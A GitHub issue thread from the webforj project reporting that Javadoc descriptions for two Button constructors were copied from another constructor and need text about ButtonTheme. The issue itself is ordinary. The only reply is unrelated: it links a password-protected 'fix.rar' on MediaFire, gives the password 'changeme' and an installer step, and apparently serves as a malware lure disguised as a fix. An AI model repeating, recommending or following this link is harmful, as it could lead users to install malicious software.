### ISSUE TITLE
[DOCS] Repeated Descriptions for Button Constructors

### ISSUE THREAD

**Issue by bbrennanbasis** [webforj/webforj#712]
The [`Button`](https://github.com/webforj/webforj/blob/main/webforj-foundation/src/main/java/com/webforj/component/button/Button.java) constructor descriptions for [`Button(String text ButtonTheme theme)`](https://javadoc.io/static/com.webforj/webforj-foundation/24.10/com/webforj/component/button/Button.html#%3Cinit%3E(java.lang.String,com.webforj.component.button.ButtonTheme)) and [`Button(String text, ButtonTheme theme, EventListener<ButtonClickEvent> clickListener)`](https://javadoc.io/static/com.webforj/webforj-foundation/24.10/com/webforj/component/button/Button.html#%3Cinit%3E(java.lang.String,com.webforj.component.button.ButtonTheme,com.webforj.dispatcher.EventListener)) are copied over from [`Button(String text, EventListener<ButtonClickEvent> clickListener)`](https://javadoc.io/static/com.webforj/webforj-foundation/24.10/com/webforj/component/button/Button.html#%3Cinit%3E(java.lang.String,com.webforj.dispatcher.EventListener)), as seen in the [Constructor Summary](https://javadoc.io/doc/com.webforj/webforj-foundation/latest/com/webforj/component/button/Button.html#constructor-summary).

- `Button(String text ButtonTheme theme)` - Include a description about `ButtonTheme` and remove the portion about `ButtonClickEvent`.
- `Button(String text, ButtonTheme theme, EventListener<ButtonClickEvent> clickListener)` - Include a description about `ButtonTheme`.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
